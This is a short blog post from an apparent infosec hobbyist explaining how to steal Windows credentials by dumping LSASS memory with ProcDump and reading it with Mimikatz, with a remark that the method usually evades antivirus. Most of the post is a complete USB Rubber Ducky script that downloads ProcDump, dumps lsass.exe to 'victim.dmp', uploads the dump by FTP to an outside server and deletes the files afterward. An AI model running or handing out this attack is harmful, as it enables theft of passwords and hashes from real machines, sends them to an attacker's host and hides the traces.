Stealing Credentials with ProcDump and MimiKatz

Hello World.

For the longest time I’ve kept this domain as my personal repository for projects, files, and relics of time gone by. Since Infosec has taken over my time as a hobby and professionally, I figured I needed to resurrect my chunk of property online and start the blog back up.

Tinker was tweeting about manipulating memory dumps, and I mentioned I had a method to do a proc dump and extract passwords from it. The great thing is that you’re using Sysinternals Procdump to do so. Microsoft bought Sysinternals a few years ago, so almost always this method gets through AV scanners. Unless a system has some strict application control policies, this method will work to extract hashes.  The key here is to offload the memory dump to another machine and run mimikatz on it.

There’s a lot of ways to clean this script up and actually automate it further. Originally, I had the file named the machine name and the date and time in which the dump was taken. That complicated things more than I wanted and kept messing things up. Perhaps the next person could improve on it some more.

I guess I’ll be presenting on this next DHA. Goal is to do a live demonstration of this. Youtube video to follow….

  • Download Procdump to machine.
  • Type, “procdump.exe -accepteula -ma lsass.exe $date$computer.dmp”
  • Run Mimikatz
  • Type, “sekurlsa::Minidump lsassdump.dmp
  • Then type, “sekurlsa::logonPasswords

Additionally I’ve created a USB Rubber Duck script to automate the entire attack.  Enjoy!

 

 

 

DELAY 150
GUI r
DELAY 150
STRING powershell
ENTER
DELAY 150
STRING cd c:\temp\
ENTER
DELAY 150
STRING $url = “http://www.<DOMAIN>/hack_tools/procdump.exe”
ENTER
DELAY 150
STRING $output = “c:\temp\procdump.exe”
ENTER
DELAY 150
STRING $start_time = Get-Date
ENTER
DELAY 150
STRING Invoke-WebRequest -Uri $url -OutFile $output
ENTER
DELAY 150
STRING invoke-expression ‘c:\temp\procdump.exe -accepteula -ma lsass.exe victim.dmp’
ENTER
DELAY 750
STRING FTP
ENTER
DELAY 150
STRING open ftp.<DOMAIN> 21
ENTER
DELAY 150
STRING <USERNAME>
ENTER
DELAY 150
STRING <PASSWORD>
ENTER
DELAY 150
STRING cd /www/hack
ENTER
DELAY 150
STRING put victim.dmp
ENTER
DELAY 30000
STRING quit
ENTER
DELAY 150
STRING rm “c:\temp\procdump.exe”
ENTER
DELAY 150
STRING rm “victim.dmp”
ENTER
DELAY 150
STRING exit
ENTER

If you’d like more info on how this is done, please see Grabbing Passwords from Memory using Procdump and Mimikatz.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.